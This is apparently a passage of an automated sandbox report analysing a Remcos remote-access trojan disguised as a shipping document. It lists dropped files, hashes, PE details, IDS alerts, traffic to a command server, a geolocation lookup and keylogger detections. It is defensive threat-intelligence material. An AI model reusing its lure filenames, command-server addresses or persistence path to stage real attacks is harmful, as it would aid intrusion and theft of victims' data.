                                                    • 194.71.126.13
                                                    ATOM86-ASATOM86NLPO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                    • 178.237.33.50
                                                    17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 178.237.33.50
                                                    Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                    • 178.237.33.50
                                                    Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    remi.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 178.237.33.50
                                                    rem.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 178.237.33.50
                                                    Salary Revision _pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    BUNKER INVOICE #U2018MV.SUN OCEAN.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Adobe\Adobe.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1013760
                                                    Entropy (8bit):7.866792196976269
                                                    Encrypted:false
                                                    SSDEEP:24576:M1zGUxjPe4rOMAsZXQsjoMCgkVbjw1292uP3:CL5e4CMAYXiMCFVbjw49bP
                                                    MD5:2108FE4BC36C181C43D01825B56D8349
                                                    SHA1:274E3B1BE233129A95658FE508706C0EBC4114A5
                                                    SHA-256:F36C39084B68E1C96F6D960A9DEF941304A3B2F93907D6650587125627BAA89F
                                                    SHA-512:955AA8CB40EFDA2B44DC3A84A849C7941F20D801ABC5DA35C020038603CA6718DE826AAF93DCDD958A5CE1808DF9B25378F72ECB39B9D0F495771B2F773FA96B
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.a...............0..n............... ........@.. ....................................@.....................................O....................................z..p............................................ ............... ..H............text....m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B.......................H.......PI..\'...........p..`..............................................}.....(.......(.......s#...}....*.0............(.....s......o.....*B..{......o%....*B..{......o$....*.0............{....(.......(....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0..5.........s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.

                                                    C:\ProgramData\Adobe\Adobe.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Adobe.exe.log

                                                    Download File
                                                    Process:C:\ProgramData\Adobe\Adobe.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                    Download File
                                                    Process:C:\ProgramData\Adobe\Adobe.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):963
                                                    Entropy (8bit):5.014904284428935
                                                    Encrypted:false
                                                    SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                    MD5:B66CFB6461E507BB577CDE91F270844E
                                                    SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                    SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                    SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                    Malicious:false
                                                    Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.866792196976269
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    File size:1'013'760 bytes
                                                    MD5:2108fe4bc36c181c43d01825b56d8349
                                                    SHA1:274e3b1be233129a95658fe508706c0ebc4114a5
                                                    SHA256:f36c39084b68e1c96f6d960a9def941304a3b2f93907d6650587125627baa89f
                                                    SHA512:955aa8cb40efda2b44dc3a84a849c7941f20d801abc5da35c020038603ca6718de826aaf93dcdd958a5ce1808df9b25378f72ecb39b9d0f495771b2f773fa96b
                                                    SSDEEP:24576:M1zGUxjPe4rOMAsZXQsjoMCgkVbjw1292uP3:CL5e4CMAYXiMCFVbjw49bP
                                                    TLSH:7D251255266BD912D4E24BB00A92E3F803798E8DA902D307DBDDBEFF7D2A7163440395
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.a...............0..n............... ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4f8cfe
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xD7610664 [Mon Jul 3 10:54:28 2084 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xf8ca90x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xfa0000x59c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xfc0000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xf7a0c0x70.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xf6d040xf6e0005f8052f4e37a53152fbf7ab238e165eFalse0.9462589003164557data7.871355192949315IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xfa0000x59c0x60057ccb1a74c92bf3fab152485a391b365False0.4186197916666667data4.05504982150493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xfc0000xc0x200c07df16482895c19725b600f825abdd7False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0xfa0900x30cdata0.43333333333333335
                                                    RT_MANIFEST0xfa3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-29T00:01:03.649524+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549707104.250.180.1787902TCP
                                                    2024-11-29T00:01:07.285991+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549709178.237.33.5080TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 29, 2024 00:01:01.857283115 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:01.977406979 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:01.977544069 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:01.984013081 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:02.104063034 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:03.606601954 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:03.649523973 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:03.892734051 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:03.901945114 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:04.021923065 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:04.022051096 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:04.142208099 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:04.762689114 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:04.764178991 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:04.884171009 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:05.045968056 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:05.087038994 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:05.258239985 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:01:05.378228903 CET8049709178.237.33.50192.168.2.5
                                                    Nov 29, 2024 00:01:05.378485918 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:01:05.378568888 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:01:05.498648882 CET8049709178.237.33.50192.168.2.5
                                                    Nov 29, 2024 00:01:07.282659054 CET8049709178.237.33.50192.168.2.5
                                                    Nov 29, 2024 00:01:07.285990953 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:01:07.296622992 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:07.416698933 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:08.275535107 CET8049709178.237.33.50192.168.2.5
                                                    Nov 29, 2024 00:01:08.275621891 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:01:24.422519922 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:24.423916101 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:24.544655085 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:54.442519903 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:01:54.444097042 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:01:54.564043999 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:02:24.442744970 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:02:24.443933964 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:02:24.563977957 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:02:54.452651024 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:02:54.453811884 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:02:54.573740959 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:02:55.087402105 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:02:55.399677992 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:02:56.009061098 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:02:57.212177038 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:02:59.618447065 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:03:04.602837086 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:03:14.212205887 CET4970980192.168.2.5178.237.33.50
                                                    Nov 29, 2024 00:03:24.473258972 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:03:24.477674007 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:03:24.597573042 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:03:54.483273983 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:03:54.489243031 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:03:54.609278917 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:04:24.482772112 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:04:24.484220982 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:04:24.604861021 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:04:54.502880096 CET790249707104.250.180.178192.168.2.5
                                                    Nov 29, 2024 00:04:54.504236937 CET497077902192.168.2.5104.250.180.178
                                                    Nov 29, 2024 00:04:54.624169111 CET790249707104.250.180.178192.168.2.5

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 29, 2024 00:01:05.100976944 CET5779853192.168.2.51.1.1.1
                                                    Nov 29, 2024 00:01:05.241297007 CET53577981.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 29, 2024 00:01:05.100976944 CET192.168.2.51.1.1.10x9e2cStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 29, 2024 00:01:05.241297007 CET1.1.1.1192.168.2.50x9e2cNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • geoplugin.net

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549709178.237.33.50801532C:\ProgramData\Adobe\Adobe.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 29, 2024 00:01:05.378568888 CET71OUTGET /json.gp HTTP/1.1
                                                    Host: geoplugin.net
                                                    Cache-Control: no-cache
                                                    Nov 29, 2024 00:01:07.282659054 CET1171INHTTP/1.1 200 OK
                                                    date: Thu, 28 Nov 2024 23:01:07 GMT
                                                    server: Apache
                                                    content-length: 963
                                                    content-type: application/json; charset=utf-8
                                                    cache-control: public, max-age=300
                                                    access-control-allow-origin: *
                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                    Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:18:00:57
                                                    Start date:28/11/2024
                                                    Path:C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                                                    Imagebase:0x900000
                                                    File size:1'013'760 bytes
                                                    MD5 hash:2108FE4BC36C181C43D01825B56D8349
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
